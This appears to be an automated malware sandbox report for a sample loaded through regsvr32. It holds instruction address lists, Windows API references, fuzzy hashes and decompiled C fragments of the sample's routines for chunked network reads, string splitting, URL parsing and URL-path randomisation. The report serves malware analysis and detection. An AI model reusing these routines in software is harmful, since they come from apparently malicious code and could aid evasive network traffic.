0x00fb5dc1
0x00fb5dc2
0x00fb5dcd
0x00fb5dd3
0x00fb5dd8
0x00fb5ddb
0x00fb5df5
0x00fb5e04
0x00fb5e10
0x00fb5e1a
0x00fb5e1f
0x00fb5e21
0x00fb5e24
0x00fb5edb
0x00fb5ee1
0x00fb5ef2
0x00fb5f05
0x00fb5f1b
0x00000000
0x00fb5f20
0x00fb5e2d
0x00fb5e34
0x00fb5e38
0x00fb5e3e
0x00fb5e40
0x00fb5e42
0x00fb5e44
0x00fb5e46
0x00fb5e50
0x00fb5e55
0x00fb5e57
0x00fb5e59
0x00fb5e5a
0x00fb5e5b
0x00fb5e5c
0x00fb5e63
0x00fb5e6a
0x00fb5e6d
0x00fb5e6d
0x00fb5e3a
0x00fb5e3a
0x00fb5e3a
0x00fb5e75
0x00fb5e7d
0x00fb5e89
0x00fb5e8e
0x00fb5e8e
0x00fb5e93
0x00000000
0x00000000
0x00fb5e95
0x00fb5e98
0x00fb5ea5
0x00000000
0x00000000
0x00fb5ea7
0x00fb5ea7
0x00fb5eb4
0x00fb5e8e
0x00fb5e93
0x00000000
0x00000000
0x00000000
0x00fb5e93
0x00fb5ebe
0x00fb5ec1
0x00fb5ec4
0x00fb5ecb
0x00fb5ecb
0x00fb5ed8
0x00000000
0x00fb5ed8
0x00fb5dc4
0x00fb5dc8
0x00fb5dc9
0x00fb5dcb
0x00000000
0x00000000
0x00000000
0x00fb5dcb
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00FB5E46
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00FB5E5C
memset.NTDLL ref: 00FB5F05
memset.NTDLL ref: 00FB5F1B

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 82a713fc8f718f253dcbef82de91fa634d3ee383564add563becabd1da2773fb
Instruction ID: 5c85deb831a8515747b778378b30d4b69080591b7ec893781868430fb7b7f630
Opcode Fuzzy Hash: 82a713fc8f718f253dcbef82de91fa634d3ee383564add563becabd1da2773fb
Instruction Fuzzy Hash: E441D371B00219AFDB10EF6ACC41BEE7779EF45760F104165B809A7281DB78EE44AF80

Uniqueness

Uniqueness Score: -1.00%

Function 00FB14A8, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00FB14A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0xfba144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E00FB6837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xfba2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00FB50CA(_v20);
											if(_v8 == 0) {
												_v8 = E00FB37FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00FB25C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x00fb14a9
0x00fb14af
0x00fb14ba
0x00fb14ba
0x00fb14bc
0x00fb5aff
0x00fb5b02
0x00fb5b0b
0x00fb5b0e
0x00fb5b11
0x00fb5b19
0x00fb5c17
0x00fb5c22
0x00fb5c25
0x00fb5c27
0x00000000
0x00fb5c27
0x00fb5b1f
0x00fb5b22
0x00fb5c2a
0x00fb5c2a
0x00fb5b28
0x00fb5b2b
0x00fb5b2c
0x00fb5b2e
0x00fb5b37
0x00fb5c0e
0x00fb5b3d
0x00fb5b43
0x00fb5b4a
0x00fb5b4d
0x00fb5bfc
0x00fb5b53
0x00000000
0x00fb5b53
0x00fb5b53
0x00fb5b53
0x00fb5b53
0x00fb5b58
0x00fb5b5a
0x00fb5b5a
0x00fb5b67
0x00fb5b6f
0x00000000
0x00000000
0x00fb5b71
0x00fb5b7e
0x00fb5b84
0x00fb5b84
0x00fb5b87
0x00000000
0x00000000
0x00fb5b89
0x00fb5b94
0x00fb5ba8
0x00fb5bde
0x00fb5baa
0x00fb5baa
0x00fb5bb1
0x00fb5bb9
0x00000000
0x00fb5bbb
0x00fb5bbb
0x00fb5bc6
0x00fb5bc9
0x00fb5bd0
0x00000000
0x00fb5bd0
0x00fb5bc9
0x00fb5bb9
0x00fb5be1
0x00fb5be4
0x00fb5bec
0x00fb5bf7
0x00fb5bf7
0x00000000
0x00fb5bec
0x00fb5b91
0x00000000
0x00fb5bd3
0x00fb5bd3
0x00000000
0x00fb5bdc
0x00fb5c03
0x00fb5c03
0x00fb5c09
0x00fb5c09
0x00fb5b37
0x00fb5b22
0x00fb5c34
0x00fb14b1
0x00fb14b1
0x00fb14b8
0x00fb14c3
0x00000000
0x00000000
0x00000000
0x00fb14b8

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00FB7134,00000000,?), ref: 00FB5B9B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00FB7134,00000000,?,?), ref: 00FB5BBB

Part of subcall function 00FB25C7: wcstombs.NTDLL ref: 00FB2687

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: 44be0d7b89dc9167e5849c2e973dcdf3807312022bf6e587c46668599ceb34b7
Instruction ID: 1f5be95270082645a0333e2fac7b20ad3f223f7bf97e001bc7f17fb558a2eb11
Opcode Fuzzy Hash: 44be0d7b89dc9167e5849c2e973dcdf3807312022bf6e587c46668599ceb34b7
Instruction Fuzzy Hash: E5414AB1D04609EFDF20AFA6D884AEDBBB9FB44750F248469E502E2150E7789E44AF10

Uniqueness

Uniqueness Score: -1.00%

Function 00FB52E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00FB52E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xfba290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xfba2a8; // 0x4d1e213d
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xfba2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00fb52ed
0x00fb52f0
0x00fb52f6
0x00fb530e
0x00fb5312
0x00fb5315
0x00fb5317
0x00fb531a
0x00fb531c
0x00fb531f
0x00fb5321
0x00fb5321
0x00fb5323
0x00fb532e
0x00fb5333
0x00fb5344
0x00fb534c
0x00fb5351
0x00fb5354
0x00fb5357
0x00fb5359
0x00fb535f
0x00fb5362
0x00fb5362
0x00fb5362
0x00fb536d
0x00fb5372
0x00fb537c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FB62E0,00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB52F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 00FB5308
memcpy.NTDLL(00000000,05739630,-00000008,?,?,?,00FB62E0,00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB534C
memcpy.NTDLL(00000001,05739630,00000001,00FB70D9,00000000,05739630), ref: 00FB536D

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 419473bc3f7b3338e33837fb41a7e99c98487785f60eca50207151e52c1038bf
Instruction ID: 002bf2602ea3675b83449e45cb8bedcc66d9afc230d582b0d32f7c9391b74bf4
Opcode Fuzzy Hash: 419473bc3f7b3338e33837fb41a7e99c98487785f60eca50207151e52c1038bf
Instruction Fuzzy Hash: B0110A72A041187FD7109B6ADCC4E9EBBFEDB817A0B040276F504D7250E6B59D00AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB578C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FB578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00FB6837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xfb92a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xfb92a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00fb5797
0x00fb579b
0x00fb579d
0x00fb579e
0x00fb57a6
0x00fb57a6
0x00fb57aa
0x00000000
0x00000000
0x00fb57a1
0x00fb57a2
0x00fb57a5
0x00fb57a5
0x00fb57b2
0x00fb57b9
0x00fb57bd
0x00fb57c5
0x00fb57cb
0x00fb57cd
0x00fb57d2
0x00fb57d6
0x00fb57d8
0x00fb57db
0x00fb57e2
0x00fb57e2
0x00fb57ec
0x00fb57ef
0x00fb57f2
0x00fb57f2
0x00fb57fe
0x00fb57fe
0x00fb580b

APIs

StrChrA.SHLWAPI(?,00000020,00000000,0573962C,?,?,?,00FB1128,0573962C,?,?,00FB55D3), ref: 00FB57A6
StrTrimA.SHLWAPI(?,00FB92A4,00000002,?,?,?,00FB1128,0573962C,?,?,00FB55D3), ref: 00FB57C5
StrChrA.SHLWAPI(?,00000020,?,?,?,00FB1128,0573962C,?,?,00FB55D3,?,?,?,?,?,00FB6BD8), ref: 00FB57D0
StrTrimA.SHLWAPI(00000001,00FB92A4,?,?,?,00FB1128,0573962C,?,?,00FB55D3,?,?,?,?,?,00FB6BD8), ref: 00FB57E2

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 6a3d344d207404224f1ae5f4a4ad8b11af835f745d6f521008ea0c4a6d186a08
Instruction ID: cf3b82077b8c96f5c6fb6dd68f5837d60173e51848ee12320f48f94c8008a1ef
Opcode Fuzzy Hash: 6a3d344d207404224f1ae5f4a4ad8b11af835f745d6f521008ea0c4a6d186a08
Instruction Fuzzy Hash: AC01B972B05715AFD3218F5A8C49F67BB9CEF86B60F210519F941C7240DB64C801AEA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB10DD, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00FB10DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xfba37c; // 0x5739630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xfba37c; // 0x5739630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xfba030) {
					HeapFree( *0xfba290, 0, _t8);
				}
				_t14[1] = E00FB578C(_v0, _t14);
				_t11 =  *0xfba37c; // 0x5739630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00fb10dd
0x00fb10dd
0x00fb10e6
0x00fb10f6
0x00fb10f6
0x00fb10fb
0x00fb1100
0x00000000
0x00000000
0x00fb10f0
0x00fb10f0
0x00fb1102
0x00fb1106
0x00fb1118
0x00fb1118
0x00fb1128
0x00fb112b
0x00fb1130
0x00fb1134
0x00fb113a

APIs

RtlEnterCriticalSection.NTDLL(057395F0), ref: 00FB10E6
Sleep.KERNEL32(0000000A,?,?,00FB55D3,?,?,?,?,?,00FB6BD8,?,00000001), ref: 00FB10F0
HeapFree.KERNEL32(00000000,00000000,?,?,00FB55D3,?,?,?,?,?,00FB6BD8,?,00000001), ref: 00FB1118
RtlLeaveCriticalSection.NTDLL(057395F0), ref: 00FB1134

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: d73f313ce1bd94a6d8dab2d0ab99e35b91617a9b08c6208725eba734beafcdeb
Instruction ID: 08e5d2a0a46e32a1e12024b3169263a0ae16f5198f2f1ddb50cdf7790a9800ae
Opcode Fuzzy Hash: d73f313ce1bd94a6d8dab2d0ab99e35b91617a9b08c6208725eba734beafcdeb
Instruction Fuzzy Hash: 4DF05871708248ABE720EF7AECC9F4A77E8BB04780B088110F641C72A1C661E840FF26

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5076, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB5076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xfba2c4; // 0x2dc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xfba308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xfba2c4; // 0x2dc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xfba290; // 0x5340000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00fb5076
0x00fb507d
0x00fb50c7
0x00fb50c9
0x00fb50c9
0x00fb5081
0x00fb5087
0x00fb508c
0x00fb5090
0x00fb5096
0x00fb509d
0x00000000
0x00000000
0x00fb509f
0x00fb50a4
0x00000000
0x00000000
0x00000000
0x00fb50a4
0x00fb50a6
0x00fb50ae
0x00fb50b1
0x00fb50b1
0x00fb50b7
0x00fb50be
0x00fb50c1
0x00fb50c1
0x00000000

APIs

SetEvent.KERNEL32(000002DC,00000001,00FB56C9), ref: 00FB5081
SleepEx.KERNEL32(00000064,00000001), ref: 00FB5090
CloseHandle.KERNEL32(000002DC), ref: 00FB50B1
HeapDestroy.KERNEL32(05340000), ref: 00FB50C1

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: a6c3aae65aaac710e5599930fa048d7221b42361b5585f823f2693fee073d4b6
Instruction ID: 56dfe16a40330be4465839f5e8b52d953792e084536f785dca1ef8b0e7a812d9
Opcode Fuzzy Hash: a6c3aae65aaac710e5599930fa048d7221b42361b5585f823f2693fee073d4b6
Instruction Fuzzy Hash: B3F03071F0571A9BDB307B76DCCCB9637A8AB04FA1B040214BD05D76D0DAA9D800BE91

Uniqueness

Uniqueness Score: -1.00%

Function 00FB50DF, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00FB50DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xfba37c; // 0x5739630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xfba37c; // 0x5739630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xfba37c; // 0x5739630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xfbb83e) {
					HeapFree( *0xfba290, 0, _t10);
					_t7 =  *0xfba37c; // 0x5739630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00fb50df
0x00fb50e8
0x00fb50f8
0x00fb50f8
0x00fb50fd
0x00fb5102
0x00000000
0x00000000
0x00fb50f2
0x00fb50f2
0x00fb5104
0x00fb5109
0x00fb510d
0x00fb5120
0x00fb5126
0x00fb5126
0x00fb512f
0x00fb5131
0x00fb5135
0x00fb513b

APIs

RtlEnterCriticalSection.NTDLL(057395F0), ref: 00FB50E8
Sleep.KERNEL32(0000000A,?,?,00FB55D3,?,?,?,?,?,00FB6BD8,?,00000001), ref: 00FB50F2
HeapFree.KERNEL32(00000000,?,?,?,00FB55D3,?,?,?,?,?,00FB6BD8,?,00000001), ref: 00FB5120
RtlLeaveCriticalSection.NTDLL(057395F0), ref: 00FB5135

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: c1ffe8ea22547c643ca15dce46641e5e327dda38bb857e42b51b389c84f667e5
Instruction ID: 87416ee5237e43bb0f24a805f374cb4f31306d405f72c3d0cd9c947194e8f905
Opcode Fuzzy Hash: c1ffe8ea22547c643ca15dce46641e5e327dda38bb857e42b51b389c84f667e5
Instruction Fuzzy Hash: 32F0DA74608609DBE718AB29DCD9F5537E4AB08B51B088218FA0287360C775EC00FE21

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3D98, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00FB3D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00FB6837(_t2);
				if(_t34 != 0) {
					_t30 = E00FB6837(_t28);
					if(_t30 == 0) {
						E00FB50CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00FB77DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00FB77DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00fb3d98
0x00fb3da2
0x00fb3da4
0x00fb3daa
0x00fb3daa
0x00fb3db3
0x00fb3db7
0x00fb3dc3
0x00fb3dc7
0x00fb3e3b
0x00fb3dc9
0x00fb3dc9
0x00fb3dcd
0x00fb3dd4
0x00fb3dd7
0x00fb3df1
0x00fb3de0
0x00fb3de0
0x00fb3de4
0x00fb3de7
0x00fb3dec
0x00fb3dec
0x00fb3df6
0x00fb3e1e
0x00fb3e24
0x00fb3e27
0x00fb3df8
0x00fb3dfa
0x00fb3e02
0x00fb3e0d
0x00fb3e12
0x00fb3e12
0x00fb3e2e
0x00fb3e35
0x00fb3e36
0x00fb3e36
0x00fb3dc7
0x00fb3e46

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00FB3CEE,00000000,00000000,00000000,05739698,?,?,00FB106E,?,05739698), ref: 00FB3DA4

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

Part of subcall function 00FB77DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00FB3DD2,00000000,00000001,00000001,?,?,00FB3CEE,00000000,00000000,00000000,05739698), ref: 00FB77EB
Part of subcall function 00FB77DD: StrChrA.SHLWAPI(?,0000003F,?,?,00FB3CEE,00000000,00000000,00000000,05739698,?,?,00FB106E,?,05739698,0000EA60,?), ref: 00FB77F5

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00FB3CEE,00000000,00000000,00000000,05739698,?,?,00FB106E), ref: 00FB3E02
lstrcpy.KERNEL32(00000000,00000000), ref: 00FB3E12
lstrcpy.KERNEL32(00000000,00000000), ref: 00FB3E1E

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 104a48ee89d2e02a6a381341c16959827509cff714c39c378f04f92c640ea564
Instruction ID: 6f18d3af2d6960bfb84e08ed6bc919ad32cf17878aafd41a6b478a8d2adf1b12
Opcode Fuzzy Hash: 104a48ee89d2e02a6a381341c16959827509cff714c39c378f04f92c640ea564
Instruction Fuzzy Hash: 6621A272908259ABCB126F76CC85AEE7FB8DF0A390B154055F9049B211D738DA05EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5D37, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB5D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00FB6837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00fb5d4c
0x00fb5d50
0x00fb5d5a
0x00fb5d61
0x00fb5d64
0x00fb5d66
0x00fb5d6e
0x00fb5d73
0x00fb5d81
0x00fb5d86
0x00fb5d90

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,057392FC,?,00FB1B37,004F0053,057392FC,?,?,?,?,?,?,00FB20B0), ref: 00FB5D47
lstrlenW.KERNEL32(00FB1B37,?,00FB1B37,004F0053,057392FC,?,?,?,?,?,?,00FB20B0), ref: 00FB5D4E

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00FB1B37,004F0053,057392FC,?,?,?,?,?,?,00FB20B0), ref: 00FB5D6E
memcpy.NTDLL(74B069A0,00FB1B37,00000002,00000000,004F0053,74B069A0,?,?,00FB1B37,004F0053,057392FC), ref: 00FB5D81

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
